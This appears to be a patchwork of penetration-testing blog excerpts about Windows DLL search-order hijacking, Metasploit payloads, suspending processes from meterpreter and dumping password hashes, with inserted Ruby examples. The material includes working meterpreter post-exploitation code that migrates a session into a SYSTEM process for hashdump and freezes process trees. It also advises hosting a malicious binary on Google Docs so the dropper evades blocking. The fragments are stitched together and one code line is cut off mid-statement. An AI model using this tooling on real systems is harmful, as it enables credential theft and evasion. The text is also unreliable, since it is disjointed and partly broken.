Nick Harbour wrote a post on Mandiant's blog about some malware that was using a DLL called 'fxsst.dll' to hide and stay persistent on a system. The DLL is used by Windows when it is acting as a fax server (anyone still do that?). He mentions some very interesting points:
- The DLL gets loaded at login by Explorer.
- The DLL exists in System32, but the loader looks for it in the Windows directory first (explorer.exe lives in C:\Windows, and an application's own directory is searched before System32).
- Explorer doesn't try to use anything inside of it via exports unless the system is acting as a fax server (so it's safe to put a pretty bland DLL there).
I thought... no, it couldn't be that simple... let's see:
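As an added example (not code from the original post or from Mandiant's write-up), here is a Ruby check for the condition the post describes: a DLL whose legitimate copy lives in System32 being shadowed by a same-named file in a directory the loader searches first. The directory layout, the file contents and the abbreviated search order are constructed for the demo; on a real host you would point it at C:\Windows and C:\Windows\System32 and use the hash of the shadowing copy for triage.

```ruby
require "tmpdir"
require "fileutils"
require "digest"

# Report copies of dll_name that the loader would find before reaching the
# directory where the DLL legitimately lives. search_dirs is the loader's
# search order; legit_dir must be one of its entries. Each hit carries a
# SHA-256 and whether it is byte-identical to the legitimate copy (a planted
# DLL will not be).
def search_order_shadows(dll_name, search_dirs, legit_dir)
  legit_index = search_dirs.index(legit_dir)
  raise ArgumentError, "#{legit_dir} is not in the search order" unless legit_index

  legit_path = File.join(legit_dir, dll_name)
  legit_hash = File.file?(legit_path) ? Digest::SHA256.file(legit_path).hexdigest : nil

  search_dirs.first(legit_index).each_with_object([]) do |dir, hits|
    candidate = File.join(dir, dll_name)
    next unless File.file?(candidate)
    sha = Digest::SHA256.file(candidate).hexdigest
    hits << { path: candidate, sha256: sha, matches_legit: (!legit_hash.nil? && sha == legit_hash) }
  end
end

# Constructed sample layout (not a real system): a legitimate fxsst.dll in
# System32 and, when planted is true, a second fxsst.dll one directory up,
# next to where explorer.exe would sit.
def demo_layout(planted: true)
  root = Dir.mktmpdir("fxsst-demo")
  windows = File.join(root, "Windows")
  system32 = File.join(windows, "System32")
  FileUtils.mkdir_p(system32)
  File.binwrite(File.join(system32, "fxsst.dll"), "MZ legitimate fax service dll (stub)")
  File.binwrite(File.join(windows, "fxsst.dll"), "MZ planted dll (stub)") if planted
  [windows, system32]
end

# For explorer.exe the application directory is C:\Windows, which the loader
# checks before System32. The remaining search-order entries (16-bit System
# directory, Windows directory, CWD, PATH) come after System32, so a planted
# copy there would lose to the legitimate DLL and is left out of the demo.
def explorer_fxsst_check(planted: true)
  windows, system32 = demo_layout(planted: planted)
  search_order_shadows("fxsst.dll", [windows, system32], system32)
end

if __FILE__ == $0
  hits = explorer_fxsst_check
  puts(hits.empty? ? "no shadowing copy" : hits.map { |h| "#{h[:path]} sha256=#{h[:sha256][0, 16]}" })
end
```

The same function works for any DLL that Explorer (or another binary in C:\Windows) resolves from System32; only the search order and the legitimate location change.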
In Part 1 I gave an example I used at CCDC with the single (non-staged) 'windows/download_exec' payload. One of the downsides of that payload is that you need to host the binary, giving up an IP/host that can be blocked. Well, Google recently (a couple of months ago) allowed people to upload 'anything' to Google Docs, and you can then share those files publicly. You probably already see where I'm going with this, but here are the steps to get it going. First, upload your malicious binary (not the dropper 'windows/download_exec', but the file it needs to execute).
Payload selection is something that rarely gets talked about in detail. Most PoCs just use calc.exe, netcat, or some kind of socket. The vast majority of Metasploit tutorials, videos and documentation use the 'windows/meterpreter/reverse_tcp' payload, which is only one of 224 possible payloads. Here is a little disclaimer: while the payloads in Metasploit don't get updated as much as other parts of Metasploit, this is point-in-time documentation of them (June 23, 2011), and the payloads available in Metasploit are constantly changing.
Just a follow-up to my previous post. One of the things that sets that method apart is that the suspension (once the DLL injection occurs) comes from within the process, and it suspends all the child processes as well. Another way you can do this, without the injection, is just sending a suspend to all the threads in the process:
pid = 2980
targetprocess = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
targetprocess.
Recently Didier Stevens wrote 'Suspender.dll', a DLL that will suspend a process and all of its child processes after a delay. 60 seconds is its default, but you can rename the DLL to add a number (e.g. 'Suspender10.dll' for 10 seconds) to make the delay whatever you wish. You can find the blog post and download here: http://blog.didierstevens.com/2011/04/27/suspender-dll/ Jonathan Cran and I had the same idea, as I'm sure many others did as well.
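One way to get the same effect from a meterpreter session, covering both the thread-suspend approach from the follow-up post above and the process-plus-children (and delay) behaviour of Suspender.dll, as an added example that is not code from either post or from Didier Stevens. It assumes the meterpreter stdapi Ruby API (client.sys.process.get_processes, client.sys.process.open, Process#thread.each_thread, thread.open(tid).suspend/resume, client.sys.process.getpid) and the Windows PROCESS_ALL_ACCESS value; the process list in the demo is constructed, and a real run needs a live session.

```ruby
# Windows PROCESS_ALL_ACCESS; meterpreter scripts get this constant from
# stdapi, so it is only defined here when running outside a session (demo).
PROCESS_ALL_ACCESS = 0x1f0fff unless defined?(PROCESS_ALL_ACCESS)

# Pure helper: from the list returned by client.sys.process.get_processes
# (hashes with 'pid' and 'ppid'), return root_pid followed by every
# descendant, breadth-first. After PID reuse a stale ppid can point at an
# unrelated newer process; the seen set keeps the walk from looping, but a
# ppid walk cannot tell such a process from a genuine child.
def process_tree(process_list, root_pid)
  children = Hash.new { |h, k| h[k] = [] }
  process_list.each { |p| children[p['ppid']] << p['pid'] }
  ordered = []
  queue = [root_pid]
  seen = { root_pid => true }
  until queue.empty?
    pid = queue.shift
    ordered << pid
    children[pid].each do |child|
      next if seen[child]
      seen[child] = true
      queue << child
    end
  end
  ordered
end

# Suspend or resume every thread of one process through stdapi.
def set_threads(client, pid, action)
  process = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
  process.thread.each_thread do |tid|
    thread = process.thread.open(tid)
    action == :suspend ? thread.suspend : thread.resume
    thread.close
  end
  process.close
end

# Freeze root_pid and everything under it. delay_seconds mirrors the
# SuspenderNN.dll naming trick. Refuses to act if the tree contains the
# meterpreter process itself, since that would freeze the session too.
def suspend_tree(client, root_pid, delay_seconds: 0)
  sleep(delay_seconds) if delay_seconds > 0
  pids = process_tree(client.sys.process.get_processes, root_pid)
  own = client.sys.process.getpid
  raise "refusing: pid #{own} (this session) is inside the tree" if pids.include?(own)
  pids.each { |pid| set_threads(client, pid, :suspend) }
  pids
end

# Undo suspend_tree; resume must be sent once per suspend on each thread.
def resume_tree(client, root_pid)
  pids = process_tree(client.sys.process.get_processes, root_pid)
  pids.each { |pid| set_threads(client, pid, :resume) }
  pids
end

if __FILE__ == $0
  # Constructed process list for the tree walk. From a meterpreter script the
  # real call would be suspend_tree(client, 2980, delay_seconds: 10).
  sample = [
    { 'pid' => 2980, 'ppid' => 800, 'name' => 'explorer.exe' },
    { 'pid' => 3100, 'ppid' => 2980, 'name' => 'cmd.exe' },
    { 'pid' => 3200, 'ppid' => 3100, 'name' => 'notepad.exe' },
  ]
  puts process_tree(sample, 2980).inspect
end
```

Thread suspend counts are per thread, so a process that was already partly suspended by something else (a debugger, Suspender.dll) will still be frozen after resume_tree; there is no way to tell from the session alone, which is one reason the DLL-injected variant is cleaner when you control the process from the start.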
When trying to dump password hashes on a Windows 2008 R2 64-bit box I constantly run into the "The parameter is incorrect" error in meterpreter. So I've had to fall back on dropping binaries, which I really don't like doing because of the added cleanup and the chance of getting 'caught'. Well, with a bit of migration you'll be back to passing the hash. Here is how, with a bit of the thought process first:
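The post's fix is migration. As an added example (my own selection logic, not the post's), here is a helper that picks a migration target for this case, on the assumption that the error comes from a 32-bit meterpreter that cannot work with LSASS on a 64-bit host, so the target must be a 64-bit SYSTEM process. It assumes the stdapi process list carries 'arch' and 'user' keys, that client.core.migrate(pid) exists, and that the preferred host names below are sensible; the process list in the test is constructed.

```ruby
# Candidate hosts for the migration, in order of preference. lsass.exe is
# deliberately not on the list: a failed migration there takes the box down,
# and hashdump reads LSASS from wherever the session lands anyway. This
# ordering is a choice made for this example, not something the post states.
MIGRATION_HOSTS = %w[winlogon.exe services.exe svchost.exe].freeze

# get_processes reports the architecture as 'x86_64' on Metasploit of the
# post's era and 'x64' on current releases; both spellings are accepted here
# (assumption about the API rather than a documented contract).
def x64_process?(proc_info)
  %w[x86_64 x64].include?(proc_info['arch'].to_s)
end

def system_process?(proc_info)
  proc_info['user'].to_s.upcase.end_with?('SYSTEM')
end

# Pure helper over the process list: 64-bit SYSTEM processes from the host
# list, excluding the one the session is already in, best candidate first.
def migration_candidates(process_list, own_pid)
  process_list.select do |p|
    p['pid'] != own_pid && x64_process?(p) && system_process?(p) &&
      MIGRATION_HOSTS.include?(p['name'].to_s.downcase)
  end.sort_by { |p| [MIGRATION_HOSTS.index(p['name'].downcase), p['pid']] }
end

# Migrate the session into the best candidate and return its process entry,
# so the caller can log where it went before running hashdump.
def migrate_for_hashdump(client)
  procs = client.sys.process.get_processes
  target = migration_candidates(procs, client.sys.process.getpid).first
  raise 'no 64-bit SYSTEM process to migrate into' unless target
  client.core.migrate(target['pid'])
  target
end

if __FILE__ == $0
  # Constructed process list; a real run needs a session and calls
  # migrate_for_hashdump(client) before hashdump.
  sample = [
    { 'pid' => 500, 'name' => 'winlogon.exe', 'arch' => 'x86_64', 'user' => 'NT AUTHORITY\\SYSTEM' },
    { 'pid' => 700, 'name' => 'svchost.exe', 'arch' => 'x86', 'user' => 'NT AUTHORITY\\SYSTEM' },
  ]
  puts migration_candidates(sample, 2980).map { |p| "#{p['pid']} #{p['name']}" }.inspect
end
```

If migration_candidates comes back empty, the session is usually not SYSTEM yet (getsystem first) or every 64-bit SYSTEM process is one you would rather not touch; dropping a binary is then the fallback the post wanted to avoid.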
Original Post: http://blog.nvisiumsecurity.com/2011/04/exploitable-mobile-app-challenge-now.html You can read the details at the above link, but it boils down to this: you make an application for iPhone or Android, you make it vulnerable to X, Y, Z types of flaws, and you win a 32 GB iPad or a Motorola Xoom. Added bonus: all the apps get submitted to OWASP for people to learn mobile security from.
This is probably the most practical and applicable IPv6 talk I've ever seen. Amazing job. Rick Hayes - Assessing and Pen-Testing IPv6 Networks (video posted by Adrian Crenshaw on Vimeo).
I felt left out… That is all..
Chris Gates wrote a blog post about the 'getvncpw' meterpreter script. I ran into the same issue on penetration tests in the past, but didn't know much about the whacked-out version of DES that RFB (the VNC protocol) uses. Not being a fan of manually editing a binary and recompiling each time I had a password to crack, I wanted to find another way, but didn't get a chance to.